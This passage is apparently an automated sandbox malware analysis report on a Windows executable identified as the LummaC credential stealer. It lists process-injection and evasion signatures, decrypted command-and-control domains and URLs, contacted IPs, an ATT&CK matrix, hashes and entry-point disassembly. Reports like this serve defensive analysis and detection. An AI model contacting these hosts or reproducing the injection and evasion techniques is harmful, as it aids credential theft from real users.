            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: BitLockerToGo.exe, 00000001.00000003.1786075321.00000000027FD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.1797722828.00000000027FD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1768083504.00000000027FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
            Source: l5u4ezxr.u51.exe, 00000000.00000002.1759588608.0000000001C2C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll{
            Source: BitLockerToGo.exe, 00000001.00000003.1786075321.00000000027FD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.1797722828.00000000027FD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1768083504.00000000027FD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.1797722828.00000000027CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI call chain: ExitProcess graph end nodegraph_1-12723
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0042E070 LdrInitializeThunk,1_2_0042E070

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Allocates memory in foreign processes
            Source: C:\Users\user\Desktop\l5u4ezxr.u51.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and writeJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\l5u4ezxr.u51.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5AJump to behavior
            LummaC encrypted strings found
            Source: l5u4ezxr.u51.exe, 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: caffegclasiqwp.shop
            Source: l5u4ezxr.u51.exe, 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: stamppreewntnq.shop
            Source: l5u4ezxr.u51.exe, 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: stagedchheiqwo.shop
            Source: l5u4ezxr.u51.exe, 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: millyscroqwp.shop
            Source: l5u4ezxr.u51.exe, 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: evoliutwoqm.shop
            Source: l5u4ezxr.u51.exe, 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: condedqpwqm.shop
            Source: l5u4ezxr.u51.exe, 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: traineiwnqo.shop
            Source: l5u4ezxr.u51.exe, 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: locatedblsoqp.shop
            Source: l5u4ezxr.u51.exe, 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: tenseddrywsqio.shop
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\l5u4ezxr.u51.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 225008Jump to behavior
            Source: C:\Users\user\Desktop\l5u4ezxr.u51.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000Jump to behavior
            Source: C:\Users\user\Desktop\l5u4ezxr.u51.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000Jump to behavior
            Source: C:\Users\user\Desktop\l5u4ezxr.u51.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 436000Jump to behavior
            Source: C:\Users\user\Desktop\l5u4ezxr.u51.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 439000Jump to behavior
            Source: C:\Users\user\Desktop\l5u4ezxr.u51.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 448000Jump to behavior
            Source: C:\Users\user\Desktop\l5u4ezxr.u51.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
            Source: C:\Users\user\Desktop\l5u4ezxr.u51.exeQueries volume information: C:\Users\user\Desktop\l5u4ezxr.u51.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\l5u4ezxr.u51.exeQueries volume information: C:\Windows VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\l5u4ezxr.u51.exeQueries volume information: C:\Windows\AppReadiness VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\l5u4ezxr.u51.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\l5u4ezxr.u51.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\l5u4ezxr.u51.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: Yara matchFile source: 1.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.1759655913.00000000022B3000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: Yara matchFile source: 1.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.1759655913.00000000022B3000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation            		1
            DLL Side-Loading            		311
            Process Injection            		2
            Virtualization/Sandbox Evasion            		OS Credential Dumping11
            Security Software Discovery            		Remote Services1
            Screen Capture            		11
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter            		Boot or Logon Initialization Scripts1
            DLL Side-Loading            		311
            Process Injection            		LSASS Memory2
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol1
            Archive Collected Data            		2
            Non-Application Layer Protocol            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            PowerShell            		Logon Script (Windows)Logon Script (Windows)11
            Deobfuscate/Decode Files or Information            		Security Account Manager22
            System Information Discovery            		SMB/Windows Admin Shares2
            Clipboard Data            		113
            Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
            Obfuscated Files or Information            		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading            		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            l5u4ezxr.u51.exe22%VirustotalBrowse

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            locatedblsoqp.shop100%URL Reputationphishing
            locatedblsoqp.shop100%URL Reputationphishing
            tenseddrywsqio.shop15%VirustotalBrowse
            traineiwnqo.shop100%URL Reputationmalware
            traineiwnqo.shop100%URL Reputationmalware

            URLs

            SourceDetectionScannerLabelLink
            condedqpwqm.shop100%URL Reputationphishing
            caffegclasiqwp.shop100%URL Reputationmalware
            millyscroqwp.shop100%URL Reputationmalware
            stagedchheiqwo.shop100%URL Reputationphishing
            https://locatedblsoqp.shop/api100%URL Reputationmalware
            stamppreewntnq.shop100%URL Reputationphishing
            evoliutwoqm.shop0%URL Reputationsafe
            https://vault.azure.net/mysql.database.azure.comhttps://cosmos.azure.comNtQuerySystemInformationAllo0%Avira URL Cloudsafe
            tenseddrywsqio.shop0%Avira URL Cloudsafe
            https://datalake.azure.net/https://graph.microsoft.us/servicebus.chinacloudapi.cndocuments.microsoft0%Avira URL Cloudsafe
            https://www.cloudflare.com/learning/access-management/phishing-attack/0%Avira URL Cloudsafe
            https://api.loganalytics.iohttps://api.loganalytics.usencountered0%Avira URL Cloudsafe
            https://tenseddrywsqio.shop/api100%Avira URL Cloudmalware
            https://traineiwnqo.shop/api_100%Avira URL Cloudmalware
            tenseddrywsqio.shop15%VirustotalBrowse
            https://locatedblsoqp.shop/6100%Avira URL Cloudphishing
            https://datalake.azure.net/https://graph.microsoft.us/servicebus.chinacloudapi.cndocuments.microsoft0%VirustotalBrowse
            https://www.cloudflare.com/5xx-error-landing0%Avira URL Cloudsafe
            https://www.cloudflare.com/learning/access-management/phishing-attack/0%VirustotalBrowse
            https://traineiwnqo.shop/api100%Avira URL Cloudmalware
            https://vault.azure.net/mysql.database.azure.comhttps://cosmos.azure.comNtQuerySystemInformationAllo0%VirustotalBrowse
            https://locatedblsoqp.shop/100%Avira URL Cloudphishing
            https://tenseddrywsqio.shop/api17%VirustotalBrowse
            https://login.microsoftonline.com/METRIC_AZURERM_API_REQUEST_BUCKETSlabel0%Avira URL Cloudsafe
            https://traineiwnqo.shop/apibul100%Avira URL Cloudmalware
            https://gallery.usgovcloudapi.net/mariadb.database.usgovcloudapi.netdev.azuresynapse.usgovcloudapi.n0%Avira URL Cloudsafe
            https://traineiwnqo.shop/api22%VirustotalBrowse
            https://www.cloudflare.com/5xx-error-landing0%VirustotalBrowse
            https://management.azure.comfailed0%Avira URL Cloudsafe
            https://tenseddrywsqio.shop/M0%Avira URL Cloudsafe
            https://traineiwnqo.shop/fXx100%Avira URL Cloudmalware
            https://locatedblsoqp.shop/17%VirustotalBrowse
            https://traineiwnqo.shop/apiK100%Avira URL Cloudmalware
            https://traineiwnqo.shop/.100%Avira URL Cloudmalware
            https://traineiwnqo.shop:443/apii100%Avira URL Cloudmalware
            https://ossrdbms-aad.database.chinacloudapi.cned25519:0%Avira URL Cloudsafe
            https://gallery.usgovcloudapi.net/mariadb.database.usgovcloudapi.netdev.azuresynapse.usgovcloudapi.n0%VirustotalBrowse
            https://traineiwnqo.shop/100%Avira URL Cloudmalware
            https://login.microsoftonline.com/METRIC_AZURERM_API_REQUEST_BUCKETSlabel0%VirustotalBrowse
            https://traineiwnqo.shop:443/apii11%VirustotalBrowse
            https://traineiwnqo.shop/20%VirustotalBrowse
            https://traineiwnqo.shop/.20%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            locatedblsoqp.shop
            		188.114.96.3
            		truetrue
            • 100%, URL Reputation
            • 100%, URL Reputation
            		unknown
            tenseddrywsqio.shop
            		104.21.69.149
            		truetrueunknown
            traineiwnqo.shop
            		188.114.96.3
            		truetrue
            • 100%, URL Reputation
            • 100%, URL Reputation
            		unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            tenseddrywsqio.shoptrue
            • 15%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            condedqpwqm.shoptrue
            • URL Reputation: phishing
            		unknown
            https://tenseddrywsqio.shop/apitrue
            • 17%, Virustotal, Browse
            • Avira URL Cloud: malware
            		unknown
            locatedblsoqp.shoptrue
              		unknown
              caffegclasiqwp.shoptrue
              • URL Reputation: malware
              		unknown
              millyscroqwp.shoptrue
              • URL Reputation: malware
              		unknown
              stagedchheiqwo.shoptrue
              • URL Reputation: phishing
              		unknown
              https://locatedblsoqp.shop/apitrue
              • URL Reputation: malware
              		unknown
              https://traineiwnqo.shop/apitrue
              • 22%, Virustotal, Browse
              • Avira URL Cloud: malware
              		unknown
              stamppreewntnq.shoptrue
              • URL Reputation: phishing
              		unknown
              evoliutwoqm.shoptrue
              • URL Reputation: safe
              		unknown
              traineiwnqo.shoptrue
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://www.cloudflare.com/learning/access-management/phishing-attack/BitLockerToGo.exe, 00000001.00000003.1786075321.0000000002870000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1786075321.00000000027FD000.00000004.00000020.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://api.loganalytics.iohttps://api.loganalytics.usencounteredl5u4ezxr.u51.exefalse
                • Avira URL Cloud: safe
                		unknown
                https://datalake.azure.net/https://graph.microsoft.us/servicebus.chinacloudapi.cndocuments.microsoftl5u4ezxr.u51.exefalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://vault.azure.net/mysql.database.azure.comhttps://cosmos.azure.comNtQuerySystemInformationAllol5u4ezxr.u51.exefalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://traineiwnqo.shop/api_BitLockerToGo.exe, 00000001.00000003.1786075321.00000000027FD000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                https://locatedblsoqp.shop/6BitLockerToGo.exe, 00000001.00000003.1786075321.00000000027FD000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                		unknown
                https://www.cloudflare.com/5xx-error-landingBitLockerToGo.exe, 00000001.00000003.1785814274.0000000002871000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1786075321.00000000027FD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1786075321.0000000002850000.00000004.00000020.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://locatedblsoqp.shop/BitLockerToGo.exe, 00000001.00000003.1786075321.00000000027FD000.00000004.00000020.00020000.00000000.sdmptrue
                • 17%, Virustotal, Browse
                • Avira URL Cloud: phishing
                		unknown
                https://login.microsoftonline.com/METRIC_AZURERM_API_REQUEST_BUCKETSlabell5u4ezxr.u51.exefalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://traineiwnqo.shop/apibulBitLockerToGo.exe, 00000001.00000002.1797722828.00000000027F1000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                https://gallery.usgovcloudapi.net/mariadb.database.usgovcloudapi.netdev.azuresynapse.usgovcloudapi.nl5u4ezxr.u51.exefalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://management.azure.comfailedl5u4ezxr.u51.exefalse
                • Avira URL Cloud: safe
                		unknown
                https://tenseddrywsqio.shop/MBitLockerToGo.exe, 00000001.00000003.1768083504.00000000027FD000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                https://traineiwnqo.shop/fXxBitLockerToGo.exe, 00000001.00000002.1797722828.00000000027D2000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                https://traineiwnqo.shop/apiKBitLockerToGo.exe, 00000001.00000002.1797722828.00000000027F1000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                https://traineiwnqo.shop/.BitLockerToGo.exe, 00000001.00000003.1786075321.00000000027FD000.00000004.00000020.00020000.00000000.sdmpfalse
                • 20%, Virustotal, Browse
                • Avira URL Cloud: malware
                		unknown
                https://traineiwnqo.shop:443/apiiBitLockerToGo.exe, 00000001.00000003.1786075321.00000000027FD000.00000004.00000020.00020000.00000000.sdmpfalse
                • 11%, Virustotal, Browse
                • Avira URL Cloud: malware
                		unknown
                https://ossrdbms-aad.database.chinacloudapi.cned25519:l5u4ezxr.u51.exefalse
                • Avira URL Cloud: safe
                		unknown
                https://traineiwnqo.shop/BitLockerToGo.exe, 00000001.00000003.1786075321.00000000027FD000.00000004.00000020.00020000.00000000.sdmpfalse
                • 20%, Virustotal, Browse
                • Avira URL Cloud: malware
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                188.114.96.3
                		locatedblsoqp.shopEuropean Union
                		13335CLOUDFLARENETUStrue
                104.21.69.149
                		tenseddrywsqio.shopUnited States
                		13335CLOUDFLARENETUStrue

                General Information

                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1502257
                Start date and time:2024-08-31 21:09:07 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 3m 43s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:5
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:l5u4ezxr.u51.exe
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@3/0@3/2
                EGA Information:
                • Successful, ratio: 50%
                HCA Information:
                • Successful, ratio: 90%
                • Number of executed functions: 16
                • Number of non-executed functions: 75
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Stop behavior analysis, all processes terminated

                Warnings

                • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target l5u4ezxr.u51.exe, PID 6528 because there are no executed function
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                15:10:08API Interceptor2x Sleep call for process: BitLockerToGo.exe modified

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                188.114.96.3play.exeGet hashmaliciousFormBookBrowse
                • www.x0x9x8x8x7x6.shop/ps9q/
                BankPaymAdviceVend.Report.docxGet hashmaliciousUnknownBrowse
                • tt.vg/BVhaS
                ORDER_pdf.exeGet hashmaliciousFormBookBrowse
                • www.begumnasreenbano.com/e8by/
                estado de cuenta adjunto.exeGet hashmaliciousFormBookBrowse
                • www.coinwab.com/kqqj/
                Fordybendes.exeGet hashmaliciousAzorult, GuLoaderBrowse
                • d4hk.shop/DL341/index.php
                ORDER_38746_pdf.exeGet hashmaliciousFormBookBrowse
                • www.begumnasreenbano.com/e8by/
                QUOTATION_AUGQTRA071244#U00b7PDF.scrGet hashmaliciousUnknownBrowse
                • filetransfer.io/data-package/zbi9vNYx/download
                QUOTATION_AUGQTRA071244PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                • filetransfer.io/data-package/kDY6Kvx6/download
                PO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).batGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                • www.katasoo.com/7qad/
                709876765465.exeGet hashmaliciousDBatLoader, FormBookBrowse
                • www.coinwab.com/kqqj/

                Domains

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                traineiwnqo.shopOmnqazpM3P.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, Stealc, VidarBrowse
                • 188.114.97.3
                IrisMichael263Fiona.lib.exeGet hashmaliciousLummaCBrowse
                • 188.114.96.3
                file.exeGet hashmaliciousLummaCBrowse
                • 188.114.97.3
                file.exeGet hashmaliciousLummaCBrowse
                • 188.114.97.3
                file.exeGet hashmaliciousLummaCBrowse
                • 188.114.97.3
                file.exeGet hashmaliciousLummaC, PureLog Stealer, VidarBrowse
                • 188.114.97.3
                file.exeGet hashmaliciousLummaC, PureLog Stealer, Stealc, VidarBrowse
                • 188.114.96.3
                file.exeGet hashmaliciousLummaC, PureLog Stealer, VidarBrowse
                • 188.114.97.3
                file.exeGet hashmaliciousLummaCBrowse
                • 188.114.96.3
                26oGUTrmHt.exeGet hashmaliciousLummaCBrowse
                • 188.114.97.3
                tenseddrywsqio.shopSetup_v1.43.exeGet hashmaliciousLummaCBrowse
                • 172.67.209.93
                locatedblsoqp.shopOmnqazpM3P.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, Stealc, VidarBrowse
                • 188.114.96.3
                IrisMichael263Fiona.lib.exeGet hashmaliciousLummaCBrowse
                • 188.114.96.3
                file.exeGet hashmaliciousLummaCBrowse
                • 188.114.96.3
                file.exeGet hashmaliciousLummaCBrowse
                • 188.114.97.3
                file.exeGet hashmaliciousLummaC, PureLog Stealer, VidarBrowse
                • 188.114.96.3
                file.exeGet hashmaliciousLummaC, PureLog Stealer, Stealc, VidarBrowse
                • 188.114.97.3
                file.exeGet hashmaliciousLummaC, PureLog Stealer, VidarBrowse
                • 188.114.96.3
                file.exeGet hashmaliciousLummaCBrowse
                • 188.114.96.3
                26oGUTrmHt.exeGet hashmaliciousLummaCBrowse
                • 188.114.96.3
                eve2kFNLD6.exeGet hashmaliciousLummaCBrowse
                • 188.114.96.3

                ASNs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                CLOUDFLARENETUSfile.exeGet hashmaliciousUnknownBrowse
                • 172.64.41.3
                SecuriteInfo.com.Win64.MalwareX-gen.30136.14956.exeGet hashmaliciousUnknownBrowse
                • 172.65.154.135
                file.exeGet hashmaliciousUnknownBrowse
                • 172.64.41.3
                file.exeGet hashmaliciousUnknownBrowse
                • 172.64.41.3
                file.exeGet hashmaliciousUnknownBrowse
                • 172.64.41.3
                OmnqazpM3P.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, Stealc, VidarBrowse
                • 162.159.134.233
                file.exeGet hashmaliciousUnknownBrowse
                • 172.64.41.3
                file.exeGet hashmaliciousUnknownBrowse
                • 172.64.41.3
                SecuriteInfo.com.Trojan.Win64.Krypt.13435.32435.exeGet hashmaliciousUnknownBrowse
                • 172.64.41.3
                play.exeGet hashmaliciousFormBookBrowse
                • 188.114.96.3
                CLOUDFLARENETUSfile.exeGet hashmaliciousUnknownBrowse
                • 172.64.41.3
                SecuriteInfo.com.Win64.MalwareX-gen.30136.14956.exeGet hashmaliciousUnknownBrowse
                • 172.65.154.135
                file.exeGet hashmaliciousUnknownBrowse
                • 172.64.41.3
                file.exeGet hashmaliciousUnknownBrowse
                • 172.64.41.3
                file.exeGet hashmaliciousUnknownBrowse
                • 172.64.41.3
                OmnqazpM3P.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, Stealc, VidarBrowse
                • 162.159.134.233
                file.exeGet hashmaliciousUnknownBrowse
                • 172.64.41.3
                file.exeGet hashmaliciousUnknownBrowse
                • 172.64.41.3
                SecuriteInfo.com.Trojan.Win64.Krypt.13435.32435.exeGet hashmaliciousUnknownBrowse
                • 172.64.41.3
                play.exeGet hashmaliciousFormBookBrowse
                • 188.114.96.3

                JA3 Fingerprints

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                a0e9f5d64349fb13191bc781f81f42e1Order enquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                • 188.114.96.3
                • 104.21.69.149
                OmnqazpM3P.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, Stealc, VidarBrowse
                • 188.114.96.3
                • 104.21.69.149
                BankPaymAdviceVend.Report.docxGet hashmaliciousUnknownBrowse
                • 188.114.96.3
                • 104.21.69.149
                file.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                • 188.114.96.3
                • 104.21.69.149
                IrisMichael263Fiona.lib.exeGet hashmaliciousLummaCBrowse
                • 188.114.96.3
                • 104.21.69.149
                https://seoservicesiox.firebaseapp.com/&err=b0qmbz0rr7j7jwfxwuge?err=am30dbsswi0Get hashmaliciousHTMLPhisherBrowse
                • 188.114.96.3
                • 104.21.69.149
                file.exeGet hashmaliciousLummaCBrowse
                • 188.114.96.3
                • 104.21.69.149
                file.exeGet hashmaliciousLummaCBrowse
                • 188.114.96.3
                • 104.21.69.149
                file.exeGet hashmaliciousLummaCBrowse
                • 188.114.96.3
                • 104.21.69.149
                file.exeGet hashmaliciousLummaC, PureLog Stealer, VidarBrowse
                • 188.114.96.3
                • 104.21.69.149

                Dropped Files

                No context

                Created / dropped Files

                No created / dropped files found

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):5.9500932356954035
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.96%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:l5u4ezxr.u51.exe
                File size:17'182'720 bytes
                MD5:5bd0ec56270d24c40aa16d7fa73f2538
                SHA1:43f9fd5ae32c851b806f501e20e2747b9f831bbe
                SHA256:7dae9ea6af1af34b4f423f1fb3e3004f35cfd00781a05fcad1b2714160eb0ac8
                SHA512:86242a1cf7c9b3ff8994e160dd06805f6e4bb4a577e58e6d0a60c70613f34ba28b71422573a8029c27212e7e5203553f02de20c9532151207c22d7655c331c5d
                SSDEEP:98304:AKq1QUe4702fsiRydEaczc6DQ2LNqMlDn4VPCIknoy1hFE+BFLiJBlS4S1N9hyt5:Eedm/RydEaczc6VLNUVqNouDQJbl
                TLSH:28073940FAC744F2D9438575906BB23F77345E058B29CB9BEB04BE6AF8376826837245
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........H................q.......................@..........................0.......h....@................................

                File Icon

                Icon Hash:b2f2f8f0e0e88880

                Static PE Info

                General

                Entrypoint:0x4796b0
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:6
                OS Version Minor:1
                File Version Major:6
                File Version Minor:1
                Subsystem Version Major:6
                Subsystem Version Minor:1
                Import Hash:1aae8bf580c846f39c71c05898e57e88

                Entrypoint Preview

                Instruction
                jmp 00007FB5B4C771D0h
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                sub esp, 28h
                mov dword ptr [esp+1Ch], ebx
                mov dword ptr [esp+10h], ebp
                mov dword ptr [esp+14h], esi
                mov dword ptr [esp+18h], edi
                mov dword ptr [esp], eax
                mov dword ptr [esp+04h], ecx
                call 00007FB5B4C521D6h
                mov eax, dword ptr [esp+08h]
                mov edi, dword ptr [esp+18h]
                mov esi, dword ptr [esp+14h]
                mov ebp, dword ptr [esp+10h]
                mov ebx, dword ptr [esp+1Ch]
                add esp, 28h
                retn 0004h
